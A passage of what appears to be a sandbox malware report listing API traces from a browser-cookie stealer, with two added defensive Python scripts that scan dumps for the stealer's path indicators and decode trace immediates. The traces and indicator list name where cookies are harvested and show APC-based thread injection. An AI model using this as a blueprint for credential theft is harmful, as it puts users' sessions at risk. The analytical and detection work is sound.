• HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010,?,?,00000000), ref: 00453294
• RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 004532AC
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 004532F8
• lstrlenW.KERNEL32(00000000,%userprofile%\AppData\Local\,?,00000000), ref: 00453317
• RtlAllocateHeap.NTDLL(00000000,?), ref: 00453329
• HeapFree.KERNEL32(00000000,00000000,00000000,cookies,?,00000000,00000000,00000014,?,00000000), ref: 00453380
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00453392
• CreateDirectoryW.KERNEL32(00000000,00000000,%userprofile%\AppData\Local\,?,00000000), ref: 004533B9
• lstrlenW.KERNEL32(\cookie.ie,%userprofile%\AppData\Local\,?,00000000), ref: 004533FF
• DeleteFileW.KERNEL32(?,%userprofile%\AppData\Local\,?,00000000), ref: 00453428
• HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00453436
• HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00453459
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$lstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymemcpywcscpy
• String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$%userprofile%\AppData\Local\$*.cookie$*.sol$*.txt$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$\Macromedia\Flash Player\$\cookie.cr$\cookie.ed$\cookie.ff$\cookie.ie$\sols$cookies$cookies.sqlite$cookies.sqlite-journal
• API String ID: 659829602-1887243743
• Opcode ID: b97140aea943932c6a80c7151d27e9e9900f0adef2bbe285a963884104116c87
• Instruction ID: 2fed26c3facebf3222eebd7690d0a166b01ffc03ca3c7711eceef8b7c07a8277
• Opcode Fuzzy Hash: b97140aea943932c6a80c7151d27e9e9900f0adef2bbe285a963884104116c87
• Instruction Fuzzy Hash: 3761B471644304BFC320AF559C49D5B7BACEB89B46F00093AFD4592162FAB89D4CC66F
Uniqueness

Uniqueness Score: -1.00%
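The function above is the sample's browser-cookie collection routine: its string table names the Firefox profile directory, the Chrome and Edge Default profiles, the Flash Player shared-object directory, the cookies.sqlite database and *.sol / *.cookie / *.txt patterns, and it stages results under %userprofile%\AppData\Local\ in files named \cookie.ie, \cookie.ff, \cookie.cr and \cookie.ed. Every call in the trace is the W (wide-character) variant, so these literals sit in memory as UTF-16LE and an ASCII-only grep over a dump misses them. The scanner below is an added example, not part of the Joe Sandbox report: it searches a byte blob for the page's own string list in both encodings. The `find_indicators` and `build_sample_dump` names are this example's own, and the dump it scans is a constructed stand-in, not data from the real .sdmp file.

```python
"""Search a memory-dump region for the cookie-theft path literals listed in the
report, in both ASCII and UTF-16LE. Added example; the sample blob is constructed."""
import re

# Literals taken from the "String ID" line of the function above.
COOKIE_INDICATORS = [
    "%APPDATA%\\Mozilla\\Firefox\\Profiles",
    "%userprofile%\\AppData\\Local\\",
    "Google\\Chrome\\User Data\\Default",
    "Microsoft\\Edge\\User Data\\Default",
    "\\Macromedia\\Flash Player\\",
    "cookies.sqlite",
    "cookies.sqlite-journal",
    "*.sol", "*.cookie", "*.txt",
    "\\cookie.ie", "\\cookie.ff", "\\cookie.cr", "\\cookie.ed",
]


def find_indicators(blob, indicators=COOKIE_INDICATORS):
    """Return {indicator: [(offset, encoding), ...]} for every occurrence of each
    indicator. Both encodings are tried because the routine above uses lstrlenW,
    lstrcpyW and FindFirstFileW, i.e. its literals are UTF-16LE in memory."""
    hits = {}
    for s in indicators:
        for enc, label in (("ascii", "ascii"), ("utf-16-le", "utf16le")):
            pattern = re.escape(s.encode(enc))
            for m in re.finditer(pattern, blob):
                hits.setdefault(s, []).append((m.start(), label))
    return hits


def build_sample_dump():
    """Constructed stand-in for a dump region: padding, one wide path, one ASCII
    pattern and one wide filename, separated by filler bytes."""
    return (b"\x00" * 16
            + "%APPDATA%\\Mozilla\\Firefox\\Profiles".encode("utf-16-le") + b"\x00\x00"
            + b"\xcc" * 8
            + b"*.sol\x00"
            + "cookies.sqlite".encode("utf-16-le") + b"\x00\x00")


if __name__ == "__main__":
    # Replace build_sample_dump() with open("<region>.sdmp", "rb").read() for a real dump.
    for s, locs in sorted(find_indicators(build_sample_dump()).items()):
        print("%-40r %s" % (s, locs))
```

On a real dump, pass the raw region bytes in place of the constructed blob; a hit on the \cookie.ie / \cookie.ff / \cookie.cr / \cookie.ed names is more specific to this routine than the browser profile paths, which legitimate software also references.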

APIs
• RtlAllocateHeap.NTDLL(00000000,59935A40,.dll), ref: 00458A8F
• RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00458AB2
• memset.NTDLL ref: 00458ACD
  • Part of subcall function 0044616D: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,59935A4D,00458AE6,73797325), ref: 0044617E
  • Part of subcall function 0044616D: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00446198
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00458B0E
• GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00458B24
• CloseHandle.KERNEL32(?), ref: 00458B3E
• StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00458B4B
• lstrcat.KERNEL32(?,642E2A5C), ref: 00458B90
• FindFirstFileA.KERNEL32(?,?), ref: 00458BA5
• CompareFileTime.KERNEL32(?,?), ref: 00458BC3
• FindNextFileA.KERNEL32(?,?), ref: 00458BD6
• FindClose.KERNEL32(?), ref: 00458BE4
• FindFirstFileA.KERNEL32(?,?), ref: 00458BEF
• CompareFileTime.KERNEL32(?,?), ref: 00458C0F
• StrChrA.SHLWAPI(?,0000002E), ref: 00458C47
• memcpy.NTDLL(?,?,00000000), ref: 00458C7D
• FindNextFileA.KERNEL32(?,?), ref: 00458C92
• FindClose.KERNEL32(?), ref: 00458CA0
• FindFirstFileA.KERNEL32(?,?), ref: 00458CAB
• CompareFileTime.KERNEL32(?,?), ref: 00458CBB
• FindClose.KERNEL32(?), ref: 00458CF4
• HeapFree.KERNEL32(00000000,?,73797325), ref: 00458D07
• HeapFree.KERNEL32(00000000,?), ref: 00458D18
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
• String ID: .dll
• API String ID: 455834338-2738580789
• Opcode ID: daa8a21e3283209211e09e3a7d71f97aba8b6bc79ff5a6444081b6c89991f9ad
• Instruction ID: 8fbc509e77b8f0db425f194887632d77f7adb8a5e6daadbfba12b74ecc791788
• Opcode Fuzzy Hash: daa8a21e3283209211e09e3a7d71f97aba8b6bc79ff5a6444081b6c89991f9ad
• Instruction Fuzzy Hash: 6A818CB1505341AFD711DF25CC84E6BBBE8FB98341F00092EF985D2261EBB4D949CB6A
Uniqueness

Uniqueness Score: -1.00%
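Several of the argument values in the function above are not pointers or flags but the first four bytes of a string that Joe Sandbox printed as a little-endian DWORD: 73797325 is the ASCII bytes 25 73 79 73, i.e. "%sys", which matches the ExpandEnvironmentStringsA call it is passed to, and 642E2A5C is 5C 2A 2E 64, i.e. "\*.d", a file-mask prefix consistent with the ".dll" literal in the String ID line and the FindFirstFileA / CompareFileTime loop that follows (so the routine walks DLLs under a %sys…% directory comparing file times; the report does not say what it does with the result, and that is not asserted here). The ASCII-decoding of such immediates is a routine analyst trick, and the decoder below is an added example rather than tooling from the report: it parses a trace line into API, module, arguments and reference address, and annotates every argument that decodes cleanly. The `decode_imm`, `parse_trace_line`, `TRACE_RE` and `SAMPLE_LINES` names are this example's own; the sample lines are copied from the trace above. The same decoder also explains 6547775A in the VirtualFree call earlier on this page (bytes 5A 77 47 65, "ZwGe").

```python
"""Decode 32-bit immediates from Joe Sandbox API traces into the ASCII
fragments they often are (first 4 bytes of a string, little-endian), and parse
trace lines so the decoding can be applied automatically. Added example."""
import re

# Matches one trace line of the form "Api.Module(arg,arg,...), ref: 0040ABCD".
# Lines without an argument list (e.g. "memset.NTDLL ref: 00448EEF") do not match.
TRACE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def decode_imm(hex8):
    """'73797325' -> '%sys'. Bytes are taken in little-endian order and trailing
    NULs stripped; returns None unless at least one byte remains and every
    remaining byte is printable ASCII (0x20..0x7E)."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", hex8):
        return None
    raw = bytes.fromhex(hex8)[::-1].rstrip(b"\x00")
    if not raw or any(b < 0x20 or b > 0x7E for b in raw):
        return None
    return raw.decode("ascii")


def parse_trace_line(line):
    """Split a trace line into its parts and list (argument, fragment) pairs for
    the arguments that decode as ASCII. Returns None for non-matching lines."""
    m = TRACE_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    decoded = [(a, decode_imm(a)) for a in args if decode_imm(a) is not None]
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "ref": m.group("ref"),
        "args": args,
        "decoded": decoded,
    }


# Copied from the trace above; the bullets are part of the report's formatting.
SAMPLE_LINES = [
    "• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00458B0E",
    "• lstrcat.KERNEL32(?,642E2A5C), ref: 00458B90",
    "• RtlAllocateHeap.NTDLL(00000000,59935A40,.dll), ref: 00458A8F",
]

if __name__ == "__main__":
    for ln in SAMPLE_LINES:
        p = parse_trace_line(ln)
        print("%-16s %s.%s decoded=%r" % (p["ref"], p["module"], p["api"], p["decoded"]))
```

Treat a decoded fragment as a hint, not proof: a value such as 0000002C decodes to "," but is just as likely a small integer, which is why the decoder insists on every byte being printable and why the fragment should be cross-checked against the API the value is passed to, as "%sys" was against ExpandEnvironmentStringsA above.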

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 00456D60: ExpandEnvironmentStringsW.KERNEL32(00449CC5,00000000,00000000,00000001,00000000,00000000,?,00449CC5,00000000), ref: 00456D77
                                                                                                                                          • Part of subcall function 00456D60: ExpandEnvironmentStringsW.KERNEL32(00449CC5,00000000,00000000,00000000), ref: 00456D91
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
                                                                                                                                        • memset.NTDLL ref: 00456F26
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
                                                                                                                                        • lstrlenW.KERNEL32(0000002C), ref: 00456F79
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00456F81
                                                                                                                                        • memset.NTDLL ref: 00456FA4
                                                                                                                                        • wcscpy.NTDLL ref: 00456FB6
                                                                                                                                        • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00456FDC
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00457011
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0045702D
                                                                                                                                        • FindNextFileW.KERNEL32(?,00000000), ref: 00457046
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 00457058
• FindClose.KERNEL32(?), ref: 0045706D
• FindFirstFileW.KERNEL32(00000000,00000000), ref: 00457081
• lstrlenW.KERNEL32(0000002C), ref: 004570A3
• FindNextFileW.KERNEL32(?,00000000), ref: 00457119
• WaitForSingleObject.KERNEL32(00000000), ref: 0045712B
• FindClose.KERNEL32(?), ref: 00457146
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
• String ID:
• API String ID: 2962561936-0
• Opcode ID: 3cb37b7c87d82707f255927f519064b70d125d8c2b851bfacd80afb2d877990e
• Instruction ID: 9bd9c86d9809d38f56bcf8e5926710411a7f53af65494e464f93c3df50cc7eb8
• Opcode Fuzzy Hash: 3cb37b7c87d82707f255927f519064b70d125d8c2b851bfacd80afb2d877990e
• Instruction Fuzzy Hash: C7818071508305AFD760EF25DC84A1BBBE9FF84705F00492EF985962A3DB78D848CB5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DEA4
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DED6
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DF08
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DF3A
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DF6C
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DF9E
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DFD0
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044E002
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044E034
• HeapFree.KERNEL32(00000000,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044E097
  • Part of subcall function 0044D57C: lstrlen.KERNEL32(?,?,ss: *.*.*.*,00000000,0045380B,00000000,?,?,?,?,000000FF,?,00000F00), ref: 0044D585
  • Part of subcall function 0044D57C: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,000000FF,?,00000F00), ref: 0044D5A8
  • Part of subcall function 0044D57C: memset.NTDLL ref: 0044D5B7
  • Part of subcall function 0044BE4A: RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 0044BE53
  • Part of subcall function 0044BE4A: HeapFree.KERNEL32(00000000,?,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044BE85
  • Part of subcall function 0044BE4A: RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0044BEA3
• StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044E0C2
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: CriticalFreeHeapSection$EnterLeavelstrlenmemcpymemset
• String ID: Scr
• API String ID: 3985022405-1633706383
• Opcode ID: 74eec2789e88a12e93a76b97927be945122450c8d2469432d77e677e83f75572
• Instruction ID: 653eb1732191f925ad78439a6fa1a454438b848e83d801dccbefdaef23513913
• Opcode Fuzzy Hash: 74eec2789e88a12e93a76b97927be945122450c8d2469432d77e677e83f75572
• Instruction Fuzzy Hash: CAB193B1B102257BE720EB778C95E6B36DCBB18740714483BF906C7245EABCD809876E
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcscpy.NTDLL ref: 00461C32
• GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00461C3E
• RtlAllocateHeap.NTDLL(00000000,?), ref: 00461C4F
• memset.NTDLL ref: 00461C6C
• GetLogicalDriveStringsW.KERNEL32(?,?), ref: 00461C7A
• WaitForSingleObject.KERNEL32(00000000), ref: 00461C88
• GetDriveTypeW.KERNEL32(?), ref: 00461C96
• lstrlenW.KERNEL32(?), ref: 00461CA2
• wcscpy.NTDLL ref: 00461CB5
• lstrlenW.KERNEL32(?), ref: 00461CCF
• HeapFree.KERNEL32(00000000,?), ref: 00461CE8
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
• String ID: \\?\
• API String ID: 3888849384-4282027825
• Opcode ID: d570fca3f95ebdd380a21d27d92cc897a2f21dff9cdd8e74faa6adbd67db00f0
• Instruction ID: 611017bbe394a62b7e11cdac1e7ad7865585692370d21bcad652b4ea63342d69
• Opcode Fuzzy Hash: d570fca3f95ebdd380a21d27d92cc897a2f21dff9cdd8e74faa6adbd67db00f0
• Instruction Fuzzy Hash: 72318E32900108BFCB119B96DD49CDFBFB9FF45364B10442AF104E2160EB75AA55DBAA
Uniqueness
Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 00443887
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00443893
• GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,00000000,?,00000000), ref: 004438AA
• GetProcAddress.KERNEL32(00000000), ref: 004438B1
• Thread32First.KERNEL32(?,0000001C), ref: 004438C1
• OpenThread.KERNEL32(001F03FF,00000000,?), ref: 004438DC
• QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 004438ED
• CloseHandle.KERNEL32(00000000), ref: 004438F4
• Thread32Next.KERNEL32(?,0000001C), ref: 004438FD
• CloseHandle.KERNEL32(?), ref: 00443909
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
• String ID: ExitProcess$KERNEL32.DLL
• API String ID: 2341152533-108369947
• Opcode ID: e4855375b68a507f536ba7745f1221919b102e4a41390f9053e7144e939cb0e0
• Instruction ID: a3e8afd9ccabfc3154fc22d293c1470253cce5c6f2c26f6adc2def29a7190487
• Opcode Fuzzy Hash: e4855375b68a507f536ba7745f1221919b102e4a41390f9053e7144e939cb0e0
• Instruction Fuzzy Hash: 3B117F7190021CBFEF106FA0DC85DEE7B79EB08755F10413AFA01A2150DBB88E459B69
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00444CC9
• GetLastError.KERNEL32 ref: 00444CD7
• NtSetInformationProcess.NTDLL ref: 00444D31
• GetProcAddress.KERNEL32(456C7452,00000000), ref: 00444D70
• GetProcAddress.KERNEL32(61657243), ref: 00444D91
• TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 00444DE8
• CloseHandle.KERNEL32(?), ref: 00444DFE
• CloseHandle.KERNEL32(?), ref: 00444E24
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
• String ID:
• API String ID: 3529370251-0
• Opcode ID: 46ed516da982ce2919b53f5b0312a35faa5074979abc545b65a9a0deb85bdce5
• Instruction ID: fbe645c044fc139c49eb66d01eb85583fdc678f857f3c8fe1c19bf9f57d4c08f
• Opcode Fuzzy Hash: 46ed516da982ce2919b53f5b0312a35faa5074979abc545b65a9a0deb85bdce5
• Instruction Fuzzy Hash: 17417CB0508345EFE710DF25DC44A2BBBE4FB88308F140A2EF55592260E7B49A49DB6B
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?), ref: 004542BE
• HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0045AEDA), ref: 004542F1
• GetComputerNameW.KERNEL32(00000000,00000000), ref: 00454318
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0045432C
• GetComputerNameW.KERNEL32(00000000,00000000), ref: 00454339
• HeapFree.KERNEL32(00000000,00000000), ref: 0045435C
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Heap$AllocateComputerFreeName
• String ID: Client$TnF
• API String ID: 3439771632-619858459
• Opcode ID: 6141f11e083e8caafa2530f1444dba21f811dfcad0cf1de0a291f09382d6391d
• Instruction ID: 8f9f988018139ce6461ffe270a4ccba3909b139122d1c27117b739c66cfb46a8
• Opcode Fuzzy Hash: 6141f11e083e8caafa2530f1444dba21f811dfcad0cf1de0a291f09382d6391d
• Instruction Fuzzy Hash: 67316B76A00205EFDB10DFA5CD80A6EB7F9FB84305F12443AE905D7261EB74ED488B29
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 00448DF9
• lstrlenW.KERNEL32(?), ref: 00448E07
• NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 00448E32
• lstrcpyW.KERNEL32(00000006,00000000), ref: 00448E5F
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Query$lstrcpylstrlen
• String ID: DelegateExecute$RgF$SOFTWARE\Classes\Chrome
• API String ID: 3961825720-32970696
• Opcode ID: 0001b780fc6a8037e279b713538c0205caf1a7341a76b30aa5d1c91061f43077
• Instruction ID: 6c559df32d1756b4891e1c0dd5e70a2b06d5743739566b8cee95b50a952d9247
• Opcode Fuzzy Hash: 0001b780fc6a8037e279b713538c0205caf1a7341a76b30aa5d1c91061f43077
• Instruction Fuzzy Hash: B7313B71A00209FFEF119F95CD84A9EBBB8FF14314F20802EF905E2260DBB99A11DB55
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?), ref: 00443E06
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 00443E6F
• lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 00443E97
• RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00443EE9
• DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00443EF4
• FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 00443F07
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
• String ID:
• API String ID: 499515686-0
• Opcode ID: 0ec81fbb9c3e6775e41184a5e41094bb43967243e60fb2e87ceb4414563a4f80
• Instruction ID: 67dc8bfc2cba0ce5002983e497b4643422e7169bb9cf7de5322f7452eb8dc5e2
• Opcode Fuzzy Hash: 0ec81fbb9c3e6775e41184a5e41094bb43967243e60fb2e87ceb4414563a4f80
• Instruction Fuzzy Hash: A7412C71C00209EBEF10EFA5DC45AAE7BB8FF00706F20456AF901A6161DB799F48DB59
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • LoadLibraryA.KERNEL32(6676736D,00000000,?,00000014,?,0044353A), ref: 0045737C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,704F4349), ref: 0045739B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6C434349), ref: 004573B0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6E494349), ref: 004573C6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,65474349), ref: 004573DC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,65534349), ref: 004573F2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateHeapLibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2486251641-0
                                                                                                                                        • Opcode ID: 9b06f39e45a3160de418a8c177c4bf0312a95cec84ac0b6e631dbd3a15de494f
                                                                                                                                        • Instruction ID: e12f6bb24ffbaecb29b4a1025689176a94ed0d86c0cfbd290e04746f2d53e84e
                                                                                                                                        • Opcode Fuzzy Hash: 9b06f39e45a3160de418a8c177c4bf0312a95cec84ac0b6e631dbd3a15de494f
                                                                                                                                        • Instruction Fuzzy Hash: EF114FF12057169EE720DBBAEC84D6733ECEB047503050576ED49C7212EA78EC4ACB68
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00457533
                                                                                                                                          • Part of subcall function 00461813: NtAllocateVirtualMemory.NTDLL([uE,00000000,00000000,[uE,00003000,00000040,?,?,?,0045755B), ref: 00461844
                                                                                                                                          • Part of subcall function 00461813: RtlNtStatusToDosError.NTDLL(00000000), ref: 0046184B
                                                                                                                                          • Part of subcall function 00461813: SetLastError.KERNEL32(00000000,?,?,?,0045755B), ref: 00461852
                                                                                                                                        • GetLastError.KERNEL32(?,00000318,00000008), ref: 00457643
                                                                                                                                          • Part of subcall function 0045AAB7: RtlNtStatusToDosError.NTDLL(00000000), ref: 0045AACF
                                                                                                                                        • memcpy.NTDLL(00000218,00466BB0,00000100,00000000,00010003,?,?,00000318,00000008), ref: 004575C2
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(00000000), ref: 0045761C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2966525677-3916222277
                                                                                                                                        • Opcode ID: d15f6e3b4352795a2d95e5757cc0781a9f4ff61ec968c210c112257d5d7a351f
                                                                                                                                        • Instruction ID: c1cd5eed49c67a02e61fe315d506c7df30c43def4f7e6ed7548f908180fd8744
                                                                                                                                        • Opcode Fuzzy Hash: d15f6e3b4352795a2d95e5757cc0781a9f4ff61ec968c210c112257d5d7a351f
                                                                                                                                        • Instruction Fuzzy Hash: F531CE71900709AFDB20CF65D984AAAB7F8EB04315F10457FE906D3242EB78EE49CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                        • Opcode ID: 054b374b825756423f62ad41e37b224ef3ec10b8d4154d6d3fe35c161315b27e
                                                                                                                                        • Instruction ID: d4d0d3276f4cb4c19e3f96d8828c63608c7846644c13acafaa3c2c3e04acd3ab
                                                                                                                                        • Opcode Fuzzy Hash: 054b374b825756423f62ad41e37b224ef3ec10b8d4154d6d3fe35c161315b27e
                                                                                                                                        • Instruction Fuzzy Hash: FEF1F230500B89CFCB31CF69C5946AAB7F4BF52305F14497EC9D786682D239AA4DCB1A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0046E0F8,0046E08C), ref: 00441932
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044197D
                                                                                                                                          • Part of subcall function 0044E398: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,0044403C), ref: 0044E3AF
                                                                                                                                          • Part of subcall function 0044E398: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 0044E3C4
                                                                                                                                          • Part of subcall function 0044E398: GetLastError.KERNEL32(00000000), ref: 0044E3CF
                                                                                                                                          • Part of subcall function 0044E398: TerminateThread.KERNEL32(00000000,00000000), ref: 0044E3D9
                                                                                                                                          • Part of subcall function 0044E398: CloseHandle.KERNEL32(00000000), ref: 0044E3E0
                                                                                                                                          • Part of subcall function 0044E398: SetLastError.KERNEL32(00000000), ref: 0044E3E9
                                                                                                                                        • GetLastError.KERNEL32(Function_00004965,00000000,00000000), ref: 00441965
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00441975
                                                                                                                                        Memory Dump Source
